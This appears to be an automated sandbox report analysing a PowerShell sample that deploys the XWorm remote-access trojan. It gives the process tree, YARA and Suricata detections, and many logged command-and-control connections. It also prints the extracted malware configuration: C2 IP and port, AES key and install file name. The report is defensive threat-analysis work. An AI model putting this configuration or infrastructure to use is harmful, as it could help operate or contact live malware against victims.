Windows
Analysis Report
92.255.57_1.112.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 3728 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\92. 255.57_1.1 12.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegSvcs.exe (PID: 4364 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - wermgr.exe (PID: 7124 cmdline:
"C:\Window s\system32 \wermgr.ex e" "-outpr oc" "0" "3 728" "2668 " "2508" " 2672" "0" "0" "2676" "0" "0" " 0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
XWorm | Malware with wide range of capabilities ranging from RAT to ransomware. | No Attribution |
{"C2 url": ["92.255.57.112"], "Port": 4418, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
Click to see the 6 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io |
| |
MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
| |
JoeSecurity_XWorm | Yara detected XWorm | Joe Security | ||
rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io |
| |
Click to see the 10 entries |
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:27:40.073058+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:27:44.937260+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:27:51.255164+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:02.442476+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:13.635190+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:14.956835+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:24.817914+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:36.005064+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:36.489510+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:37.296156+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:38.348994+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:42.036211+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:42.973564+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:43.095818+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:44.925973+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:48.630200+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:54.584189+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:56.224582+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:28:59.397393+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:10.286476+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:10.408688+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:10.534909+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:14.930046+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:21.005626+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:21.127308+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:26.505737+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:34.036600+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:37.114630+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:37.722426+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:39.411657+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:44.932971+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:51.180581+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:29:53.588912+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:00.926930+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:02.051886+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:02.201358+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:13.305969+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:15.214395+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:21.148508+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:22.589673+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:22.980738+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.505065+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.628001+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.749463+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:28.871836+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:33.927249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:44.927199+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:45.048649+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:30:56.914325+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:00.770510+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:06.161472+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:07.568542+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:09.051997+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:14.979305+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:16.724496+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:16.846847+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:22.178348+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:27.083048+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
2025-01-14T08:31:29.286494+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:27:40.116270+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:27:51.257204+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:02.445368+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:13.637235+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:24.820770+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:36.007395+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:36.491595+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:37.308760+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:38.351281+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:42.039660+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:42.984115+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:43.098048+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:48.632500+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:54.586259+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:56.481043+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:28:59.411702+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.288599+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.410806+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.536690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.654485+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.659497+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.775817+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:10.785619+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:21.007583+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:21.131335+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:26.510277+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:34.040662+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:37.116024+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:37.739551+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:39.415353+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:51.250458+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:29:53.591335+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:00.932702+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:02.053255+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:02.202639+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:13.307925+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:21.244123+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:22.591934+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:22.984877+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.506877+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.629443+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.750818+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:28.873138+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:33.929262+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:44.929510+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:45.180503+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:45.185470+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:30:56.916244+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:00.774964+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:06.163091+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:07.570003+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:09.053540+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:16.726844+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:16.848458+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:22.187059+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:27.084367+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
2025-01-14T08:31:29.287318+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:27:44.937260+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:29:20.787767+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Binary string: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | DNS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Window created: | Jump to behavior |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process Stats: |
Source: | Code function: | 0_2_00007FFD34882EFA | |
Source: | Code function: | 0_2_00007FFD34885F28 | |
Source: | Code function: | 0_2_00007FFD34883E65 | |
Source: | Code function: | 0_2_00007FFD3488A769 | |
Source: | Code function: | 0_2_00007FFD3488EFD8 | |
Source: | Code function: | 0_2_00007FFD348840FA | |
Source: | Code function: | 0_2_00007FFD34889907 | |
Source: | Code function: | 0_2_00007FFD34886239 | |
Source: | Code function: | 0_2_00007FFD348851B0 | |
Source: | Code function: | 0_2_00007FFD34887A74 | |
Source: | Code function: | 3_2_0288C2D8 | |
Source: | Code function: | 3_2_02886340 | |
Source: | Code function: | 3_2_028884B8 | |
Source: | Code function: | 3_2_0288B598 | |
Source: | Code function: | 3_2_02885A70 | |
Source: | Code function: | 3_2_02885728 | |
Source: | Code function: | 3_2_02880FA0 |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
